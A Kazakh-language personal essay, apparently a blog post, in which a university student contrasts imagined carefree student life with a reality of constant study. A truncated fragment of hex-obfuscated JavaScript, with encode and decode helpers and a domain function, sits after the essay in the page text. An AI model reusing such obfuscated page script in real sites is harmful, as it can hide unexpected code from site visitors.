Студенттік өмір

    Мектепте оқып жүргенде студенттік өмірді былай елестететінмін: біріншіден, жатақханада достарыңмен бірге тұрасың, демек "әй" дейтін әже, "қой" дейтін қожа жоқ, екіншіден, сабаққа қашан барғың келсе сонда барасың, жалықтырып жіберетін үй тапсырмалары болмайды, үшіншіден, таусылмайтын қыдырулар, көңіл көтеретін кештер, ішімдік және қыздар. Қазір мен студентпін, жоғарыда айтылып кеткендердің тек бірінші пункті орындалуда. Бір қызығы, студент болысымен менің ойлауым да өзгерді, лекцияларға бару, бармау - өз еркім, бірақ бұның бәрі өзіме керек екенін анық түсінемін, әрбір демалыста қыдырып, ішімдік ішуге де ештеңе кедергі емес, бірақ денсаулығым туралы көп ойланатын болдым. Шынымды айтайын, бас кезінде өзімді "нағыз студент" сияқты сезініп, жоғарыдығы үш пунктің бәрі де болды, қыдырулар да, сабаққа бармау да, қыздар да. Бір мезетке өзімді "нағыз студентпін" деп ойладым, бірақ бағаларым нашарлап кетті. Уақыт өте келе, жаман қылықтардан бас тарттым, маған ешкім "қой" деген де жоқ, өзім өзімді үлкен адам ретінде сезіндім, бір сөзбен айтатын болсақ маған "ми кірді". Дәл осы кезде болашақ өмірім туралы да ойлар көп келді, "мен кім боламын?" "қайда жұмыс жасаймын?" деген сұрақтарға жауап іздей бастадым, толығымен сабаққа беріліп кеттім.  

     Қазір менің бар ойым сабақта, мен оқып жүрген университетте барлығына уақыт жете бермейді, сен не сабаққа берілесің, не қыдырып, көңіл көтеріп соңынан университеттен шығарылысың. Кейде өзімді "вакуумде" өмір сүріп жүргендей сезінемін, күнде-күнде сол қайталана беретін сабақтар, университет территориясынан анда-санда ғана шығып тұрамыз. Әрине басқа өзіңе қызықты заттармен де айналысуға болады, бірақ жеке өзімде оған энергия жетпейді ме, әлде өзіме ештеңе қызық емес болып кетті ме. Айтқым келіп отырғаным, бізде студенттік өмір тек бір рет ғана болады, мен сол "студенттіктің" дәмін таттым, бірақ қазір өзімді тек сабақ оқитын "зомбимын" деп есептеймін, мүмкін есейгендіктен болар, немесе сабақтың қиын болуынан шығар, не де болса студенттік өмірім осылай өтер деп ойлаған жоқпын. Бір қорқатыным, барлық студенттік өмірім осылай өтіп кетеді ме деп, себебі ата-аналарымызды, ағаларымызды тыңдасақ, олардың ең қызықты шақтары ол - студенттік өмірлері, неге менде сондай өмір жоқ?

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e


Бөлісу: